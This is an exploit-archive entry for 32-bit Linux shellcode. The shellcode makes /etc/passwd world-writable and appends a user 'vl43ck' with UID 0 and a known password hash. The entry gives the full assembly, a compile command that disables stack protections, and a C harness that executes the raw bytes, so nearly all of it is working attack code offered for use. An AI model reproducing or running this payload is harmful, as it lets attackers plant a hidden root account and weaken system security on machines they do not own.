Lucene search

K
zdtVL43CK1337DAY-ID-33350
HistoryOct 10, 2019 - 12:00 a.m.

Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)

2019-10-1000:00:00
VL43CK
0day.today
35
# Exploit Title: Linux/x86 -  Add User to /etc/passwd Shellcode (59 bytes)
# Exploit Author: sagar.offsec (VL43CK)
# Guided by: Touhid M.Shaikh
# Designation: Security Consultant at SecureLayer7
# Website: https://www.sagaroffsec.com
# Tested on: Ubuntu i386 GNU/LINUX
# Shellcode Length: 59

----------------------(DESCRIPTION)----------------------------

This shellcode will first change /etc/passwd permission to 777 and then
add a user "vl43ck" in it with password "test" with root permissions.

----------------------(SHELLCODE DUMP)-------------------------
global _start

section .text
_start:

	;chmod 777 /etc/passwd

	xor eax, eax
	push eax

	push 0x64777373
	push 0x61702f63
	push 0x74652f2f
	xor ebx, ebp
	lea ebx, [esp]

	xor ecx, ecx
	mov cx, 0x1ff

	mov al, 0xf
	int 0x80

	;add user in /etc/passwd

	;open /etc/passwd

	xor eax, eax
	mov al, 5
	xor ecx, ecx
	mov cx, 2001Q
	int 0x80

	;write into /etc/passwd
	
	xor ebx, ebx
	mov ebx, eax	

	jmp short call_write
write:
	pop ecx

	xor eax, eax	
	xor edx, edx
	mov dx, 132
	mov al, 4
	int 0x80

	; close /etc/passwd

	xor eax, eax
	mov al, 6
	int 0x80

	;exit gracefully
	
	push eax
	xor eax, eax
	mov al, 1
	xor ebx, ebx
	pop ebx
	int 0x80

call_write:

	call write
	shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash"

	
----------------------(COMPILE)-------------------------

gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c

----------------------(C-Code)--------------------------

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";

main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}